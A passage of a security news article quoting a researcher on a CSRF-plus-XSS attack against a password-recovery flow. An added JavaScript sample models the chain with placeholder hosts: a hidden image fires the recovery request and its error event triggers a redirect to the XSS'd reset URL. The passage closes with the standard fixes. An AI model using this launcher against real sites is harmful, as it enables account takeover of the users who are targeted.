“…that password recovery is often at the center of attention for attackers – and for security professionals,” reported Oren.
“The link should actually refer to an attacker’s site (and it does): http://www.orenh.com/test.html#Emailfirstname.lastname@example.org. The attacker’s site performs a CSRF with the customized email address, and once completed, launches the XSS exploit. The code might look like this:” said Oren.
“The code above reads a hash parameter (“Email”) for the victim’s email. It creates an invisible image and puts an “initialize password recovery” link as its source. After the request is processed, an Error event is thrown (since this is not really an image).”
At this point the attacker has grabbed the victim’s new password and cookie information through the XSS attack.
“The onError handler now redirects to the XSS’d URL. The user clicks “Reset Password”… and from here the sky is the limit.”
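The attack chain Oren describes (hash parameter in, hidden image as the CSRF carrier, error event as the trigger for the redirect to the XSS’d URL) is easy to misread in prose, so here is an added illustration of it. This is not Oren’s code, which the article does not reproduce; the recovery and reset endpoints under target.example are hypothetical placeholders, and the actual XSS payload is not on the page and is not modeled. Image and navigation are injected so the same logic can be dry-run in Node with stand-ins:

```javascript
// Added example, not Oren Hafif's original code. Models the described chain:
// read the target e-mail from the URL hash, fire the "initialize password recovery"
// request through an invisible <img>, and on the resulting error event redirect to
// the XSS'd reset URL. Both URLs below are hypothetical placeholders.
const RECOVERY_INIT_URL = 'https://target.example/account/recovery?email=';
const XSS_RESET_URL = 'https://target.example/account/reset?email=';

// Extract the address from a hash such as "#Emailvictim@example.org".
function emailFromHash(hash) {
  const m = /^#Email(.+)$/.exec(hash || '');
  return m ? decodeURIComponent(m[1]) : null;
}

function buildUrls(email) {
  const enc = encodeURIComponent(email);
  return { csrf: RECOVERY_INIT_URL + enc, xss: XSS_RESET_URL + enc };
}

// deps.ImageCtor / deps.navigate are injected: in a browser they would be Image and
// location.replace; in the Node dry run below they are stand-ins.
function runAttack(hash, deps) {
  const email = emailFromHash(hash);
  if (!email) return { started: false, email: null };
  const { csrf, xss } = buildUrls(email);
  const img = new deps.ImageCtor();
  if (img.style) img.style.display = 'none';   // the "invisible image"
  img.onerror = () => deps.navigate(xss);       // fires once the non-image response arrives
  img.src = csrf;                               // cross-site GET: recovery initiated in the victim's browser
  return { started: true, email, csrf, xss };
}

// Node dry run: a stand-in Image that "fails to load" as soon as src is set,
// mirroring the browser's error event for a response that is not an image.
function dryRun(hash) {
  const log = [];
  class FakeImage {
    constructor() { this.style = {}; this.onerror = null; }
    set src(url) { log.push('GET ' + url); if (this.onerror) this.onerror(); }
  }
  const result = runAttack(hash, {
    ImageCtor: FakeImage,
    navigate: (u) => log.push('NAVIGATE ' + u),
  });
  return { ...result, log };
}

if (typeof window === 'undefined') {
  console.log(dryRun('#Emailvictim@example.org').log);
}
```

In a real page the call would be `runAttack(location.hash, { ImageCtor: Image, navigate: (u) => location.replace(u) })`. The two properties the chain depends on are also the two standard fixes: if initiating recovery required a POST carrying a session-bound anti-CSRF token, the hidden-image GET would do nothing, and if the reset page output-encoded the address it reflects, the redirect would land on a harmless page.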